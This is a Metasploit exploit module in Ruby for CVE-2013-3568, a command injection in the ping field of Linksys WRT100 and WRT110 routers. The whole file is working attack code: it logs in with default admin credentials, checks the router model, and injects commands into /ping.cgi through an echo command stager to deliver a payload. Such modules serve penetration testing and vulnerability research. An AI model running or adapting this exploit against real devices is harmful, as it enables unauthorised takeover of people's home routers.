##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linksys Devices pingstr Remote Command Injection',
      'Description' => %q{
        The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command
        injection exploit in the ping field of the web interface.
      },
      'Author'      =>
        [
          'Craig Young', # Vulnerability discovery
          'joev', # msf module
          'juan vazquez' # module help + echo cmd stager
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2013-3568'],
          ['BID', '61151'],
          ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
        ],
      'DisclosureDate' => 'Jul 12 2013',
      'Privileged'     => true,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSLE,
      'Targets'        =>
        [
            ['Linux mipsel Payload', { } ]
        ],
      'DefaultTarget'  => 0,
      ))

    register_options([
      OptString.new('HttpUsername', [ false, 'Valid router administrator username', 'admin']),
      OptString.new('HttpPassword', [ false, 'Password to login with', 'admin']),
      OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
      OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
    ], self.class)
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/HNAP1/'
      })
    rescue ::Rex::ConnectionError
      vprint_error("A connection error has occured")
      return Exploit::CheckCode::Unknown
    end

    if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    test_login

    execute_cmdstager({:flavor => :echo})
  end

  # Sends an HTTP request with authorization header to the router
  # Raises an exception unless the login is successful
  def test_login
    print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")

    res = send_auth_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })

    if not res or res.code == 401 or res.code == 404
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
    else
      print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
    end
  end

  # Run the command on the router
  def execute_command(cmd, opts)
    send_auth_request_cgi({
      'uri' => '/ping.cgi',
      'method' => 'POST',
      'vars_post' => {
         'pingstr' => '& ' + cmd
      }
    })

    Rex.sleep(1) # Give the device a second
  end

  # Helper methods
  def user
    datastore['HttpUsername']
  end

  def pass
    datastore['HttpPassword'] || ''
  end

  def send_auth_request_cgi(opts={}, timeout=nil)
    timeout ||= datastore['TIMEOUT']
    opts.merge!('authorization' => basic_auth(user, pass))
    begin
      send_request_cgi(opts, timeout)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end
end
